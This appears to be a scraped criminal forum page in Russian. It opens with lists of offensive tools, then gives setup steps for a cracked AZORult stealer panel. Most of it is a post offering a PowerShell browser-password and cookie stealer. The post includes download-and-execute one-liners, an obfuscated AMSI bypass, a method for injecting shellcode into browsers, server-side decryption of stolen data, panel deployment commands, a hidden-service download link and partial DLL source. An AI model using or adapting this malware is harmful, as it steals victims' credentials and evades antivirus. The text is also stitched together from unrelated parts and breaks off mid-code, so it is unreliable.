wafw00f
wePWNise
winfo
zenmap
############################
############################
APK Easy Tool
Frida-kill
appmon
APK Editor Studio
Frida-ls-devices
dex2jar
Android Debug Bridge (adb)
Frida-ps
dex2smali
Apkid
Frida-trace
frida-objection
Apktool
Frida
frida-pygmentize
BurpSuite
GDA-android-reversing-Tool
jadx-gui
Bytecode-Viewer
Mobile Security Framework (MobSF)
luyten
DB Browser for SQLite
Multi-Drive
vulnerable apk
Drozer
Nox
Frida-discover
OWASP ZAP Proxy
############################
############################
Bettercap
Jumpstart
RouterScan
ettercapNG
BeyondTrustDiscoveryTool
MultiRelay
RunFinger-Python
nc
Cain
Nessus Pro.url
SSH Scan
nc64
Dumpper
NetworkMiner
SSL-Strip
netscan
Evil FOCA
Nirsoft Launcher
SnmpWalk
snmptest
FindSQLSrv-Python
Nsauditor
Waircut
sslyze
Goby - Attack surface mapping
Responder-Python
WinScanX GUI
Icmp-Redirect-Python
Responder
Wireshark
############################
############################
ADFSpray - MS Password Spray Attack
KeeThief
ASREPRoast
Kraken-Password crack RAR ZIP 7z
BlackBullet 2.1.6
L0phtCrack 7 (Win64)
BlackBullet 2.5.1
LAPSToolkit
BruteXMLRPC
MSOLSpray - A Password Spraying Tool
Bruter
MailSniper
Cain
Md5Cracker
CeWL-Creating Custom Wordlists
OpenBullet
Check-LocalAdminHash
Password recovery
CredNinja
Patator - Brute-force
Crunch
RiskySPN
DSInternals
SessionGopher
DomainPasswordSpray
Smtp-cracker
Fast-RDP-Bruteforce
WinScanX GUI
Get-LAPSPasswords
WinScanX-CL
Go-jwt-cracker
XBruteForcer (CMS)
Hash-Buster- Online Crack hashes
XMLrpc-bruteforcer
Hash-identifier
cap2hccap
Hashcat CLI
cap2hccapx
Hashcat GUI
jwtcat - Cracking JSON Web Token
IMAP Bruteforce
mimikatz.x64
Internal-Monologue
mimikatz.x86
Inveigh
mimikittenz
Invoke-TheHash
pydictor-dictionary builder for brute-force
John the ripper
rainbowcrack-cl
John the Ripper GUI
rcrack-gui
KeeFarce
thc-hydra-BruteForce
############################
############################
APK Easy Tool
Extractor
Unpacker
ollydbg
Apktool
IDA Pro 32
binaryninja
dnSpy-x86
windbgx64
Binwalk
IDA Pro 64
de4dot-net35-x64
dnSpy
windbgx86
Bytecode-Viewer
ResourceHacker
de4dot-net35
jadx-gui
x32dbg
Trial-Reset
de4dot-net45-x64
luyten
x64dbg
- Dotnet
AntiTampRem
DotNET Tracer x64
ExtremeDumper x64
StringDecryptor
AntiTamperKiller
DotNET Tracer x86
Kripto v1.0 Deobfuscator
Universal_Fixer
ConfuserEx AntiDump Fixer
ExtremeDumper x32
MegaDumper
Universal_Fixer_NoFuser3
- Extractor
InnoExtractor
InstallShield mini Extractor
LFS Setup Extractor
UniExtract
lessmsi-gui
- Unpacker
Armageddon
EnigmaVBUnpacker
RL! DePeCompact 2.x
UntElock 0.98+
Aspack
Exe2Aut v0.11
UPXEasyGUI
upx_unpacker
De4dot
MART! K UnPacker
Unpacker_PECompact
############################
############################
Acunetix
Recurse Buster
AppSpider 7
SPartan-Sharepoint fingerprinting and attack Tool
Aquatone
SQLMap-GUI
Arjun
SQLi-Hunter-SQLMAP API wrapper
Atlas-Quick SQLMap Tamper Suggester
SQLmap
Atscan
SSL-Scan
BSQLGUI
SSRFmap-SSRF Scanner
BruteXMLRPC
Scrawlr
BruteXSS
See-SURF- find potential SSRF parameters
BurpSuite
Shuriken-XSS
CMSeeK- CMS Detection and Exploitation suite
SleuthQL
Cansina - Web Content Discovery
Spaghetti
Commix
TestSSL.sh
Corsy-CORS Misconfiguration Scanner
VBscan
DSSS-sql-injection
WAScan
Dalfox - XSS Scanning
WPScan-WordPress Vulnerability Scanner
DirBuster
Wapiti-Web Vulnerability Scanner
Dirble- WebSite Directory Scanning
WebCruiserWVS
Dirsearch- Web path scanner
WebInspect 20.1.0
Droopescan
Weblogic-Scanner
ExploitMyUnion
WhatWAF
Eyewitness
WhatWeb
Findom-XSS
Wordpress Exploit Framework
FireFox-Pentesting
XBruteForcer (CMS)
Fuxploider-File upload scanner and exploitation
XMLrpc-bruteforcer
Golismero
XSS-Freak
Gowitness-Web screenshot utility
XSS-Loader Tools
HCL AppScan Standard
XSSfork - XSS Vulnerability Scan
Havij
XSSpwn
IIS-ShortName-Scanner
XSSsniper
IIS-Shortname-Scan (Python)
XSStrike
Joomscan
XSpear-XSS Scanning
Link JS Find - Extract URL Websites
dotdotpwn - Directory Traversal Fuzzer
LinkFinder
ffuf - Fuzz Faster
Netsparker
httprecon
Nikto
identYwaf
NoSQLMap
jsql-injection-GUI
Nuclei - Web Scanner based on templates
jwtcat - Cracking JSON Web Token
OWASP ZAP Proxy
pentest-tools
Quick-SQL
sslyze
R3con1z3r-Web information gathering
wafw00f
ReadyAPI 2.8.2
wfuzz
############################
############################
AD Control Paths
SSL-Scan
BSQLGUI
Searchsploit
DSSS-sql-injection
Shuriken-XSS
Droopescan
SleuthQL
Egress-Assess
Spaghetti
ExploitMyUnion
TestSSL.sh
Golismero
VBscan
Grouper2
WAScan
Joomscan
WebCruiserWVS
Nessus Pro
Weblogic-Scanner
Nikto
WinScanX GUI
NoSQLMap
WinScanX-CL
NtdsAudit
XSS-Freak
OWASP Mutillidae- Vulnerable web-application
XSS-Loader Tools
OWASP ZAP Proxy
XSSpwn
PowerSharpPack-Usefull offensive CSharp Projects
XSSsniper
PwnedPasswordsNTLM
XSStrike
SMBGhost-CVE-2020-0796
XSpear-XSS Scanning
SQLMap-GUI
bWAPP- vulnerable web-application
SQLmap
jsql-injection-GUI
SSH Scan
zBang
############################
############################
Autoruns
KillSwitch
Task Explorer x64
dnSpy
Binwalk
LockHunter
Task Explorer
exeinfope
Comodo Cleaning Essentials
Microsoft Sysinternals
UPXEasyGUI
exiftool
CrowdInspect
PE Detective
UniExtract
loki-upgrader
CrowdInspect64
PPEE
VirusTotal Uploader 2.2
loki
Detect it easy
Process Hacker 2
Volatility-CL
ollydbg
FLOSS
ProcessActivityView
VolatilityWorkbench-gui
pdbripper
FolderChangesView
ProcessHacker
Winja (VirusTotal Uploader)
pestudio
HijackCleaner64
Regshot-x64-ANSI
Wireshark
peview
ILProtectorUnpacker
Regshot-x64-Unicode
apateDNS
windump
IREC-1.9.16
RunPEDetector32
dnSpy-x86
############################
############################
Payload-List
PayloadsAllTheThings
Probable-Wordlists
RobotsDisallowed
SecLists
fuzzdb
############################
############################
Asoftis IP Changer
Freedome
Proxifier
Tor Browser
Avira Phantom VPN
Gather proxy
Proxy-Scraper
W10Privacy
Betternet
Hotspot Shield
ProxyCap
WPD
ChrisPC Anonymous Proxy Pro
OOSU10
Simple DnsCrypt
YogaDNS
############################
############################
Active Presenter - Screen Recoreder
HTTP File Server (HFS)
ShareX
AnyDesk
HeidiSQL
Simple DnsCrypt
Bandizip
HostsFileEditor
Start Tor Browser
Boxstarter Shell
HxD
Task Explorer x64
CCleaner
IObit Uninstaller
Task Explorer
CFF Explorer
KeePass 2
ThemeTool
Charles proxy
KeepNote
Tor Browser
Chrome -with XSS Auditor disabled
KeepPass
Wireshark
Chrome
MarkdownEdit
YogaDNS
CyberChef
Microsoft Edge
hjsplit
DB Browser for SQLite
Neo4j_start.bat
neo4j-community
Docker Desktop
Neo4j_stop.bat
ngrok- reverse proxy
Driver Booster 7
NetworkMiner
notepad ++
Email extractor
Nirsoft Launcher
peview
FLOSS
OpenVPN GUI
services
Fiddler
PE Detective
shellcode_launcher
FireFox-Pentesting
ProcessHacker
vlc
Firefox
RunAsDate
uTorrent
Google chrome
ScreenToGif
Greenshot
Search Everything
Essential NetTools
NetLimiter 4
############################
############################
Airbase-ng
Airventriloquist-ng
Kstats
WifiInfoView.exe
Aircrack-ng-GUI
Besside-ng
Makeivs-ng
WirelessNetView.exe
Aircrack-ng
Bettercap
Packetforge-ng
Wireshark
Airdecap-ng
Buddy-ng
RouterScan
Wpaclean
Airdecloak-ng
Cain
SSL-Strip
ettercapNG
Aireplay-ng
Dumpper
Tkiptun-ng
ivstools
Airodump-ng
Easside-ng
WNetWatcher.exe
wifi-perfiles
Airolib-ng
Elcomsoft Wireless Security Auditor
Waircut
Airserv-ng
Evil FOCA
Wesside-ng
Airtun-ng
Jumpstart
WifiChannelMonitor
############################
############################
DDos-Attack (Python)
Slowloris HTTP DoS IPv6
DDos-Attackv1 (Python)
Slowloris HTTP DoS
HostDown- DDos Attack
THC-SSL-Dos
Impulse Denial-of-service ToolKit
TheDoomsday- Test DOS sustainablity
Perl Flood Script (DDoS)
WhatWAF
Priv8-ddos
identYwaf
Saddam-DDoS Amplification Tool
wafw00f [/ SPOILER]
AZORult 3.2 Crack Install Manual
CrydBrox прекратил поддержку софта, поэтому уже можно выкидывать без зазрения совести )
Установка:
1. Регистрируем домен и хостинг.
2. Заливаем архив с панелькой на хостинг.
3. Распаковываем архив.
4. Заходим в панельку, меняем атрибуты на 777 к папкам и файлам: files,
config и links ( Рекурсивно! )
5. Меняем имя папки Panel на свое.
6. Заходим в Базу Данных и содаем новую базу.
7. Импортируем файл sql в нашу созданную базу, файл лежит в
panel/info/dump.sql
8. Правим index.php в корне сайта на наши данные.
Прописываем путь панели
Вводим имя пользователя и имя базы, а так же пароль к базе.
Пишем свой пароль к панельке.
9. Проверяем панельку на работоспособность.
10. Запускаем билдер:
Прописываем путь к нашему index.php который мы правили. Пример:
http://sitevirus.com/index.php (пишем в ручную)
Вирус появиться в папке где находится билдер.
Меняем расширение файла bin на .exe
11. Проверяем отстук.
СКАЧАТЬ:
Hidden content for authorized users.
https://www.sendspace.com/file/u7fknh
(с) автор неизвестен
Всем привет. Представляю вашему вниманию стиллер, написанный на powershell. Все подробности ниже.
Spoiler: Что интересного
-Сбор паролей Firefox based и Chromium based браузеров
-Сам стиллер почти полностью написан на powershell. Исключение - это DLL, которая будет инжектится в процесс хрома для анлока куки файлов. О самом анлоке в следующем пункте. Также есть небольшая вставка C# кода для импорта rstrtmgr.dll, но тут меня можно простить, тк pwsh это делать просто не умеет)
-Разлок куки файлов при запущенном Хроме/Эдже и тд. Процесс браузера при этом не убивается, все происходит без лишнего палева.
-DLL to shellcode конвертер. В паблике реализацию этого на powershell не видел. Болтается одна на гитхабе, но там это код C# завернутый в pwsh. Здесь же все написано на самом pwsh. Использовать этот функционал будем для вышеупомянутого анлока куки файлов. Берется DLL и аргументы к ней, все конвертится в шеллкод и инжектится в процесс браузера. Техника самого инжекта не моя, но конкретно на ее авторство я и не претендую.
-Сервер-сайд расшифровка паролей и куков, за исключением старых версий хрома, там пароли расшифровываются с помощью DPAPI, а это делать лучше на самом пк. В остальном все сервер-сайд, дабы зря не триггерить аверы. Расшифровка хрома выполняется с помощью python библиотек. Расшифровка фф с помощью NSS библиотек, благо их можно установить на nix сервера одной командой.
-Sqlite ридер на powershell для чтения куков и логиндаты chromium based браузеров.
-Добавлены некоторые фишки по обходу AMSI. Они немного костыльные, но рабочие. Почему костыльные? Да потому что, чтобы спасаться от детектов без костылей, то нужно ультимативное решение - полиморфный обфускатор. Его нет по нескольким причинам: писать его несколько месяцев, если не год, а если заказывать, то обойдется он в охулион, поэтому имеем, что имеем) Да и вообще, это уже было бы отдельным проектом, как бы) Но повторюсь, текущей функциональности для решения наших задач вполне хватает.
-Панель написана на python, фреймворк Flask, в качестве WSGI сервера используется gunicorn.
Spoiler: Почему powershell
Понимаю, тема холиварная, на форуме написана куча постов как и в защиту пвш, так и против него . Но я отношу себя к тем, кто считает, что несмотря на некоторые минусы, powershell почти идеален в плане относительной лекгости ухода от детектов. Запустил процесс powershell, обошел AMSI и делай почти что хочешь, и никакой крипт не нужен. И это все при поддержке .NET. Конечно, соглашусь, что для каждого продукта надо смотреть отдельно, но для стиллера пвш подойдет просто отлично.
Spoiler: Описание работы
Если даже не разбираетесь в кодинге, то все равно рекомендую прочитать данный
раздел, для лучшего понимания, что и как работает, это никогда не повредит.
Начнем с базы) Powershell это скриптовый язык и формат ps1 не является
исполняемым. Поэтому классикой в pwsh малвари является ее запуск с помощью cmd
команд, эти cmd команды будут уже вшиваться в другие исполняемые форматы (exe,
vbs, js и что там еще есть). Да, вроде как есть другие способы запуска, но в
подавляющем большинстве случаев происходит все именно так. Если же льете
инсталлы с лоадера, то проливщику также нужно будет дать эту cmd (или pwsh,
зависит от лоадера) команду. Но в этом подходе есть одна проблема: в cmd
команду не удастся впихнуть код всего стиллера, тк есть ограничение по
количеству символов, их должно быть не более 8191. Поэтому используются так
называемые oneliner'ы, one и line, однострочники типа) Как правило в
ванлайнере все сводится к скачиванию тела малвари и его исполнению. Админка
будет выдавать вам поморфленные ванлайнеры, но в чистом виде в нашем случае
они будут выглядеть следующим образом:
cmd:
powershell -ep bypass "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://127.0.0.1:5000/st/')"
pwsh:
Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://127.0.0.1:5000/st/')
Здесь как раз происходит то, что я описал выше. Вебклиент скачивает стиллер и
запускает его с помощью функции Invoke-Expression это что-то типа eval'а в
python или js.
Теперь пройдемся по стиллеру. Сорцы расписывать не буду, тк можете их
посмотреть самостоятельно, объясню тезисно логику исполнения.
1. Функцией Get-PCInformation собирается информация о железе,
юзернейм, таймзона и тд, здесь ничего особого, типичная функциональность для
любого стиллера.
2. Запускается функция Get-Browsers ,
2.1. Здесь сначала рекурсивно в папке %LOCALAPPDATA% ищутся профили
chromium based браузеров, для каждого профиля в цикле for запускается сбор
данных.
2.1.1. На этом этапе все начинается с получения ключа для декрипта паролей
и куков. Сам мастеркей лежит в зашифрованном виде в файле
C:/путь/до/папки/браузера/Local State, расшифровываем его с помощью DPAPI.
2.2.2. Читаем файл с логиндатой (C:/путь/до/профиля/Login Data). Если
браузер запущен, то файл лочится для чтения, но здесь помогает простое
копирование, так что копируем и читаем уже копию. Парсим БД Sqlite ридером
(функция Dump-DB), смотрим значения зашифрованных паролей. Если пароль
начинается с байтов @(118,49,48), то пошифрован он был относительно новой
версией хрома и расшифровать его можно будет на стороне сервера, используя
полученный ранее мастеркей. В этом случае просто записываем все значения в
массив. В ином случае пароль расшифровывается так же с помощью DPAPI и
кладется в результат уже в открытом виде.
2.2.3. Читаем файл куки (C:/путь/до/профиля/Network/Cookies или
C:/путь/до/профиля/Cookies). Все, включая парсинг и расшифровку, делается по
аналогии с логиндатой. Единственное, но важное исключение состоит в том, что с
недавних времен chromium based браузеры лочат куки файл и его не удается даже
скопировать. Происходит это потому, что браузер открывает куки файл с
аргументом FILE_SHARE_NONE. Анлок без админ прав можно выполнить только из
процесса, который открывал файл, то есть, из процесса браузера. Можно,
конечно, убить процесс, но поступим аккуратнее, попробуем разлочить файл. Для
этого вызывается функция Unlock-File, в ней нужно найти PID процесса
(функция Get-FileLockProcess) и заинжектить заранее подготовленный
шеллкод. Чекаем разрядность процесса, и качаем с панели нужную DLL, вызываем
функцию ConvertTo-Shellcode , она сунет в длл путь к файлу куки и вернет
шеллкод. Его в функции Invoke-Shellcode заинжектим в процесс хрома. Ждем
10 секунд, пока шеллкод прошуршит и пробуем прочитать файл. Вуаля, все готово)
2.2.4. Возвращаем всю полученную информацию и кидаем в массив. Все это
производим с каждым профилем.
2.2. Далее ищем все профили Firefox based браузеров и так же каждый
профиль прокручиваем в цикле.
2.2.1. Тут абсолютно вся расшифровка происходит на стороне сервера NSS
библиотеками. Им нужно подать на вход папку с данными, поэтому с парсингом
файлов здесь голову себе не морочим, а просто читаем в профиле файлы key4.db,
cert9.db, logins.json, cookies.sqlite. Этого будет достаточно. Файлы
файрфоксом лочатся, но как и в случае с файлом логиндаты хрома, помогает
простое копирование.
3. Перегоняем полученные данные в JSON формат. Да, это пара сотен строк
кода, но зато на стороне сервера python'ом это прекрасно парсится и
складывается в БД.
4. Шифруем данные обычным AES'ом. Можно и без этого, но лишним не будет.
Соединение же не защищено, да и может какой-то авер будет сниффать трафик.
5. Отправляем на сервер. Сервер все получает, парсит, расшифровывает, что
надо, не расшифровывает, что не надо, и складывает в бд.
Spoiler: Немного об уходе от детектов и обходе AMSI
Об этом немало написано и тут на форуме и вообще в интернетах, принципиально
нового я здесь ничего не скажу, но все же для тех, кто только входит в эту
тему, пройдемся по основным моментам. Те, кто об этом всем знает, можете
пропустить этот раздел, просто скажу, что панель обходит амси стандартными
техниками)
И повторюсь, в начале я уже писал, что такие обходы это не универсальное
решение, но в нашей ситуации рабочее. Если хотите универсальное, то нужен
хороший обфускатор. Те, что с гитхаба, не работают. Поэтому обходимся
минимальными средствами)
Итак, что же такое AMSI. Это аббревиатура от Antimalware Scan Interface. В этот интерфейс пвш и другие скриптовые языки шлют все скрипты и команды, подающиеся им. Его же слушает и авер, и если он видит в скрипте/команде что-то подозрительное, то пвш не может это исполнить. По задумке MS это должно сильно помогать ловить вредоносный код на скриптовых языках, но в случае с powershell это лекго обходится.
Базово обход выглядит так:
Code:Copy to clipboard
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
Есть еще один, но в нем больше кода, так что, остановимся на этом) Здесь с помощью рефлексии .NET мы берем класс System.Management.Automation.AmsiUtils и переписываем в нем свойство amsiInitFailed , устанавливая значение true. Как понятно из названия, в этом свойстве отображается состояние сессии амси, зафейлилась ли она при инициализации или нет. Также в этом классе есть метод ScanContent , отсылающий содержимое скрипта на сканирование аверу. Но если он видит, что amsiInitFailed установлен в true, то ничего никуда не отсылается. Тупо? Ну да, но это же майкрософт, так что нечему удивляться.
Пробуем исполнить вышеуказанный код, но он не запускается, ловим ошибку со
следующим содержимым:
Все дело в том, что в самом обходе амси содержатся сигнатуры, которые и ловит
авер. Выполняем скрипт по частям, видим, что эти сигнатуры это
'System.Management.Automation.AmsiUtils', 'amsiInitFailed' и 'SetValue', их
нам и нужно будет сбить**,** немного поморфив, здесь работают даже самые
примитивные техники обфускации строк. Вот пример конструкции, которую можно
получить, разбавив сигнатуры рандомными спецсимволами, и вызвав при исполнении
replace()
Code:Copy to clipboard
[ref].Assembly.GetType('S*y!s*t*e*m!.!M!a$n!a*g!e*m*e!n!t$.$A*u*t!o!m*a*t$i*o*n!.!A!m*s*i!U*t$i*l!s*'.replace('$','').replace('!','').replace('*','')).GetField('a!m=s-i-I=n=i-t-F=a-i!l!e-d='.replace('!','').replace('=','').replace('-',''), 'NonPublic,Static').('S)e%t%V)a}l%u%e}'.replace('}','').replace(')','').replace('%',''))($null, $true)
Исполняем
Все ок, ошибок нет, амси отключен.
Реплейсы здесь показаны как пример, на самом деле, можно придумать кучу всего.
Например, перегнать все в char array, а при исполнении сделать обратно
строкой. Или воспользоваться сплитами и так далее. Тут набор техник почти
неограничен.
Теперь, обойдя амси, с помощью того же Invoke-Expression можно запустить, по
сути, любой код.
Пока выходим из этой сессии пвш и открываем новую, амси пока не отключаем. Для наглядности возьмем мини скрипт, в котором заведомо есть сигнатура. Пусть это будет
Code:Copy to clipboard
Write-Host 'Invoke-Shellcode'
Пробуем запустить, видим, что амси нас сбрил. Прописываем обход амси, пробуем
запустить еще раз, на этот раз все ок.
Далее нам нужно собрать в один скрипт и обход амси, и запуск команды с сигнатурой через функцию Invoke-Expression, о которой говорил ранее. Но тут возникает проблема: в скрипте мы же уже тащим с собой сигнатуру, а обход амси нам только предстоит, спалиться можно еще перед запуском. Тут тоже решение предельно простое, ту часть, которую мы будем засовывать в Invoke-Expression мы так же можем поморфить или накрыть энкодингом или каким-то простым шифрованием. К примеру, создадим из этого кода base64 строку, а в самом скрипте пвш перед исполнением получим из нее уже нормальный код. В итоге получившийся скрипт будет выглядеть так:
Code:Copy to clipboard
[ref].Assembly.GetType('S*y!s*t*e*m!.!M!a$n!a*g!e*m*e!n!t$.$A*u*t!o!m*a*t$i*o*n!.!A!m*s*i!U*t$i*l!s*'.replace('$','').replace('!','').replace('*','')).GetField('a!m=s-i-I=n=i-t-F=a-i!l!e-d='.replace('!','').replace('=','').replace('-',''), 'NonPublic,Static').('S)e%t%V)a}l%u%e}'.replace('}','').replace(')','').replace('%',''))($null, $true)
iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('V3JpdGUtSG9zdCAnSW52b2tlLVNoZWxsY29kZSc=')))
Опять же, base64 энкодинг здесь приведен просто в качестве примера, вместо него можно засунуть что угодно, главное сбить сигнатуры еще на подходе. А что пойдет в Invoke-Expression уже неважно, тк амси будет отключен.
Примерно так же панель отдает ванлайнеру тело стиллера, оно как раз вшито в эту конструкцию вместо нашего тестового скрипта. Делается все посредством python'а и jinja шаблонов. Увидеть результат вы можете в админке на странице builds или покопавшись в сорцах. Также панель немного морфит сами ванлайнеры в тех местах, на которые потенциально может заагриться авер. Это строки 'System.Net.WebClient', 'DownloadString' и IP адрес панели.
Spoiler: Панель
Страница со списком логов
Подробная информация
Страница с билдами. Здесь нам обычно будут нужны CMD и PWSH oneliner'ы. Нужно
просто скопировать их отсюда. При каждом обновлении страницы они будут немного
отличаться. Взависимости от способа распространения может пригодиться AMSI
Wrapped Stealer, но тут нужно точно знать, что делаете. Plaintext Stealer
здесь добавлен исключительно для наглядности, что называется for testing
purposes only. НИКОГДА НЕ ИСПОЛЬЗУЙТЕ ЕГО В БОЕВОМ РЕЖИМЕ!
Страница Settings. Тут обязательно указываем IP адрес панели. Без этого
стиллер работать не будет. Именно этот IP будет вшиваться в ванлайнеры и тело
стиллера. Также есть галочка ON/OFF Stealer. Если состояние OFF, то
ванлайнерам тело стиллера отдаваться не будет, вместо этого вернется ошибка
500. Для чего это сделано. Когда вы не ожидаете появления новых логов, можете
выключить стиллер, так скрипт не будет торчать наружу, что убережет нас от
любопытных инфобез исследователей. Включили стиллер, сделали пролив, выключили
стиллер. Панель сама жива, с логами работать можно, но новые не добавятся.
Главное, не забыть включить перед следующим проливом) В принципе, можно с этим
не морочиться, по дефолту все и так включено, но если выключать, когда не
нужно, софт в теории проживет дольше.
Spoiler: Поднятие панели
Берем обычный Linux VPS, заливаем туда архив. Дальнейшая инструкция сделана
для Debian 11, но в принципе поднять можно на любом линуксе. Только команды,
разумеется, могут отличаться.
Начинаем с апгрейда и установки необходимых пакетов
Code:Copy to clipboard
apt-get update && apt-get upgrade -y
apt-get install libnss3-dev libnss3 python3 python3-pip unzip gnupg curl p7zip-full -y
Устанавливаем и настраиваем MongoDB (если у вас не дебиан 11, то репозитории могут отличаться. посмотрите актуальный на https://www.mongodb.com/)
Code:Copy to clipboard
curl -fsSL https://www.mongodb.org/static/pgp/server-7.0.asc | \
gpg -o /usr/share/keyrings/mongodb-server-7.0.gpg \
--dearmor
echo "deb [ signed-by=/usr/share/keyrings/mongodb-server-7.0.gpg ] http://repo.mongodb.org/apt/debian bullseye/mongodb-org/7.0 main" | tee /etc/apt/sources.list.d/mongodb-org-7.0.list
apt-get update
apt-get install mongodb-org -y
systemctl enable mongod
systemctl start mongod
mkdir -p /data/db
chown -R mongodb:mongodb /data/db
chown -R mongodb:mongodb /var/lib/mongodb
chown mongodb:mongodb /tmp/mongodb-27017.sock
systemctl restart mongod
Смотрим, все ли ок, запуская команду
Code:Copy to clipboard
systemctl status mongod
Должен быть примерно такой вывод:
Порт монго по дефолту не торчит наружу, поэтому этот пункт не то чтобы
обязательный, но если перфекционизм не дает покоя, то для большей безопасности
можете запаролить БД.
Вот неплохой гайд на эту тему
Предыдущая версия данного руководства была написана Мелиссой Андерсон. MongoDB, или просто Mongo, — это документоориентированная база данных с открытым исход…
![www.digitalocean.com](/proxy.php?image=https%3A%2F%2Fwww.digitalocean.com%2F_next%2Fstatic%2Fmedia%2Fandroid- chrome-192x192.f09059d8.png&hash=cb32bb7a47980fb69b4c305d1852701f&return_error=1) www.digitalocean.com
Только имейте в виду, что в файлах run_debug и gunicorn.conf.py вам будет необходимо поменять env переменную FLASK_MONGO_URI, добавив туда данные авторизации.
Распаковываем архив с панелью
Code:Copy to clipboard
7z x panel.zip
Переходим в папку с сорцами
Code:Copy to clipboard
cd panel
Устанавливаем необходимые python библиотеки
Code:Copy to clipboard
pip3 install -r requirements.txt
Для запуска в продакшн моде в качестве WSGI сервера будем использовать
gunicorn. Он уже был установлен нами с помощью pip'a.
Запускаем:
Code:Copy to clipboard
gunicorn --bind 0.0.0.0:5000 --workers=3 --timeout 240 wsgi:app
Открываем браузер, переходим по ссылке 1.1.1.1:5000/admin/ (заменяем ip адрес
на ваш)
Тут нас встретит окно с созданием админского юзера. Создаем его.
Уже писал об этом, когда описывал панель, но повторюсь. Идем в settings и
задаем ip адрес панели в соответствующей строке. Он будет вшит в ванлайнеры и
стиллер, именно туда он и будет стучать.
Для тестов достаточно и этого, но для постоянной работы нужно сделать еще один
момент. Мы запускали сервер командой из консоли, следовательно, если мы из
консоли выйдем, то и сервер оффнется, нам это не нужно, поэтому на нашем впс
нужно запускать панель как сервис, грубо говоря, как фоновый процесс с
автозапуском после ребутов и тд.
Создаем файл**/etc/systemd/system/stealer.service**
В него пишем следущее:
Code:Copy to clipboard
[Unit]
Description=Gunicorn instance to serve stealer
After=network.target
[Service]
User=root
Group=www-data
WorkingDirectory=/root/panel
ExecStart=/usr/local/bin/gunicorn --workers 3 --timeout 240 --bind 0.0.0.0:5000 wsgi:app
[Install]
WantedBy=multi-user.target
В разделе Service меняем значение User на свое.
Также в WorkingDirectory указываем путь к папке с панелью.
В ExecStart меняем путь к gunicorn'y на свой (у меня это
/usr/local/bin/gunicorn). Узнать его можно выполнив команду
which gunicorn
Сохраняем файл и выполняем команды:
Code:Copy to clipboard
systemctl start stealer
systemctl enable stealer
Убеждаемся, что сервис запустился
Code:Copy to clipboard
systemctl status stealer
Если видим следующий вывод, то все ок, сервис запущен.
Spoiler: Что дальше
Под каждого универсальную малварь не напишешь, поэтому в ходе эксплуатации вы
можете столкнуться с рядом проблем, поэтому попробую изложить, что в идеале
каждому придется сделать под себя. Пригодится очень базовое умение кодить, ну
или желание это умение приобрести по ходу дела. Пройдемся по нюансам:
-Предоставленный обход AMSI и ванлайнеры рано или поздно удрочится. Так бы проработало месяцами, но учитывая, что софт выходит в паблик, то это вопрос пары дней, поэтому нужны будут свои правки. Вряд ли это будет сложно, но все же, надо знать, что и где подправлять. Общую информацию по AMSI я дал, каждый может взять сорцы и внести необходимые изменения, добавить свои техники морфинга строк, может быть их как то скомбинировать и тд. Чем уникальнее ваш способ будет, тем лучше. Но сорцы у вас есть, так что все в ваших руках)
-DLL, которые будем инжектить в браузеры для анлока куков задрочятся еще раньше, тк сразу после публикации некоторые побегут заливать их на VT, да и возможно какие-нибудь вайтхэты приложат к этому руку) Тут не спасет обход AMSI, тк он помогает от сигнатурных детектов, а если будете из под процесса powershell писать в память другого процесса грязь, то любой авер это спалит. Поэтому идеальным вариантом для каждого тут было бы поморфить или разбавить мусорным кодом их сорц и скомпилировать по новой. Такая уникальная DLL вам прослужит долго. Как вариант, можно криптануть их с уникальным стабом, но это дорого, и вопрос, так ли стаб будет уникален. Поэтому лучше ручками) На эти темы есть пара статей на форуме, да и в гугле инфы должно быть полно.
Но пока, на момент публикации, все работает из коробки, так что, велком)
И еще один важный момент:
Перед использованием в боевом режиме удалите или закоментируйте все строки с
командой Write-Host в стиллере. Они сделаны для наглядности, для работы в
проде они не нужны, более того, если скрипт будет запускаться исполняемым
форматом, то в этих местах он может фейлиться, т.к. не будет иметь доступа к
консоли.
Spoiler: Сорцы
Линк на скачивание панели:
http://damaga377vyvydeqeuigxvl6g5sbmipoxb5nne6gpj3sisbnslbhvrqd.onion/d/3bXFGVKPw86UxnxKC37gCO
Сорц DLL для анлока куки файла:
Spoiler
Code:Copy to clipboard
#include "pch.h"
#include <Windows.h>
#include <iostream>
#include <strsafe.h>
#include <psapi.h>
#include <tchar.h>
#include <process.h>
#include <winternl.h>
#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 16
#define ObjectTypeInformation 2
#define ObjectTypeInformationSize 1024 * 1024 * 16
#define NT_SUCCESS(x) ((signed int)(x) >= 0)
#define BUFSIZE 512
#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 16
#define ObjectTypeInformation 2
#define ObjectTypeInformationSize 1024 * 1024 * 16
#define NT_SUCCESS(x) ((signed int)(x) >= 0)
#define BUFSIZE 512
using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
using fNtDuplicateObject = NTSTATUS(WINAPI*)(
HANDLE SourceProcessHandle,
HANDLE SourceHandle,
HANDLE TargetProcessHandle,
PHANDLE TargetHandle,
ACCESS_MASK DesiredAccess,
ULONG Attributes,
ULONG Options
);
using fNtQueryObject = NTSTATUS(WINAPI*)(
HANDLE ObjectHandle,
ULONG ObjectInformationClass,
PVOID ObjectInformation,
ULONG ObjectInformationLength,
PULONG ReturnLength
);
typedef enum _POOL_TYPE
{
NonPagedPool,
PagedPool,
NonPagedPoolMustSucceed,
DontUseThisType,
NonPagedPoolCacheAligned,
PagedPoolCacheAligned,
NonPagedPoolCacheAlignedMustS
} POOL_TYPE, * PPOOL_TYPE;
typedef struct _OBJECT_TYPE_INFORMATION
{
UNICODE_STRING Name;
ULONG TotalNumberOfObjects;
ULONG TotalNumberOfHandles;
ULONG TotalPagedPoolUsage;
ULONG TotalNonPagedPoolUsage;
ULONG TotalNamePoolUsage;
ULONG TotalHandleTableUsage;
ULONG HighWaterNumberOfObjects;
ULONG HighWaterNumberOfHandles;
ULONG HighWaterPagedPoolUsage;
ULONG HighWaterNonPagedPoolUsage;
ULONG HighWaterNamePoolUsage;
ULONG HighWaterHandleTableUsage;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ULONG ValidAccess;
